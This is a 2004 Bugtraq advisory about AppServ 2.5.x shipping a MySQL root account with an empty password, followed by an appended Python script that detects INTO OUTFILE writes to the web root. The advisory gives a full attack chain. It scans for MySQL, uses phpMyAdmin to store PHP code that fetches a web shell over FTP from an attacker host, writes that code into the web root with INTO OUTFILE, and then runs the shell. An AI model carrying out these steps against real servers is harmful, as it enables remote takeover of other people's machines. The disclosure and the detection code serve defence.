Message-ID: <20041118161815.26349.qmail@www.securityfocus.com>
Date: 18 Nov 2004 16:18:15 -0000
From: saudi linux <ksa2ksa@...oo.com>
To: bugtraq@...urityfocus.com
Subject: AppServ 2.5.x and Prior Exploit
What is AppServ
==========
AppServ is an open source installer package for Apache/PHP/MySQL.
Objective:
- Easy to build a web server and database server.
- For those who are just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that are easily ported to other platforms such as WindowZ.
- Single-step installation; no need to perform a multiple-step, time-consuming installation and configuration.
- Ready to run just after you've finished installing.
- If you hate the boring M$ IIS Webserver.
=====================================================
AppServ URL: http://www.appservnetwork.com
Vulnerable versions: 2.5.X and prior
Problem:
=================================
The program ships with a default user (root) and an empty password, which lets an attacker control the program and the computer.
=================================
Exploit Method
1) Scan tool (SuperScan or whatever).
This step scans for the MySQL service on port 3306.
2) When we find a service (MySQL on 3306), we can request the IP from IE (Internet Explorer).
From IE we can request the machine IP like (http://xxx.xxx.xxx.xxx)
3) If we succeed, the index page for AppServ opens.
4) Now we can edit the databases and tables in MySQL through phpMyAdmin.
From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)
5) The default MySQL server comes with two databases (test, mysql); our target is (mysql).
Now we can add a new table containing our exploit:
- Create a new table, for example (exploit), with one field of type TEXT.
- Insert the exploit (PHP code) into the database, like:
==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY);
ftp_quit($conn_id);
?>
==============end=====================
The attacker could use "Windows FTP Server" or any FTP daemon; it doesn't matter :-)
phpshell.php is a script built on functions like (system, passthru, exec ... etc).
You can find a nice phpshell here (http://phpfm.sf.net)
The attacker could download an EXE file instead.
6) Now we are able to write the query output to a file by using the INTO OUTFILE statement.
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'
7) Query.php contains our PHP code.
8) If we succeed, we can request
(http://xxx.xxx.xxx.xxx/Query.php)
9) If the FTP connection is successful and phpshell.php is downloaded to the victim PC, you can send a new request like:
(http://xxx.xxx.xxx.xxx/phpshell.php)
10) Game Over
==================================================
Fix
=====
1) Change the root password.
2) Use a firewall for the Apache and MySQL servers.
3) Use Safe Mode for your scripts.
==============================================================
discovered by Saudi Linux
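
A detection check for step 6 of the post, added here as an example and not part of the original message: it scans query-log lines for INTO OUTFILE / INTO DUMPFILE statements that write under the web root or use a script extension. The log lines, function names and extension list are constructed assumptions; the web root is the path quoted in the post.

```python
import re
from pathlib import PureWindowsPath

# Assumptions: the AppServ document root from the post, plus a hypothetical
# list of extensions the web server would hand to the PHP interpreter.
WEB_ROOT = PureWindowsPath(r"C:\AppServ\www")
SCRIPT_EXTS = {".php", ".php3", ".phtml"}

# Statement as it appears in a query log (backslashes still SQL-escaped).
OUTFILE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(.+?)\2", re.IGNORECASE)

def sql_unescape_path(raw):
    """Undo SQL escaping of backslashes and unify path separators."""
    return raw.replace("\\\\", "\\").replace("/", "\\")

def is_under(path, root):
    """Case-insensitive containment test for Windows paths."""
    p = [part.lower() for part in path.parts]
    r = [part.lower() for part in root.parts]
    return p[:len(r)] == r

def find_webroot_writes(log_lines, web_root=WEB_ROOT):
    """Return (line_no, path, reasons) for file-writing queries worth review."""
    findings = []
    for no, line in enumerate(log_lines, 1):
        m = OUTFILE_RE.search(line)
        if not m:
            continue
        path = PureWindowsPath(sql_unescape_path(m.group(3)))
        reasons = []
        if is_under(path, web_root):
            reasons.append("under web root")
        if path.suffix.lower() in SCRIPT_EXTS:
            reasons.append("script extension")
        if reasons:
            findings.append((no, str(path), reasons))
    return findings

# Constructed sample lines in the style of a MySQL general query log.
SAMPLE_LOG = [
    "041118 16:20:01\t  12 Query\tSELECT * FROM orders INTO OUTFILE 'D:\\\\backup\\\\orders.csv'",
    "041118 16:21:44\t  13 Query\tSELECT * From exploit INTO OUTFILE 'C:\\\\AppServ\\\\www\\\\Query.php'",
    "041118 16:22:10\t  13 Query\tselect 1 into dumpfile 'c:/appserv/WWW/img/x.gif'",
    "041118 16:23:02\t  14 Query\tSELECT COUNT(*) FROM users",
]

if __name__ == "__main__":
    for no, path, reasons in find_webroot_writes(SAMPLE_LOG):
        print(f"line {no}: {path} ({', '.join(reasons)})")
```

Paths containing `..` are not normalized here, so a production check should resolve them before the containment test.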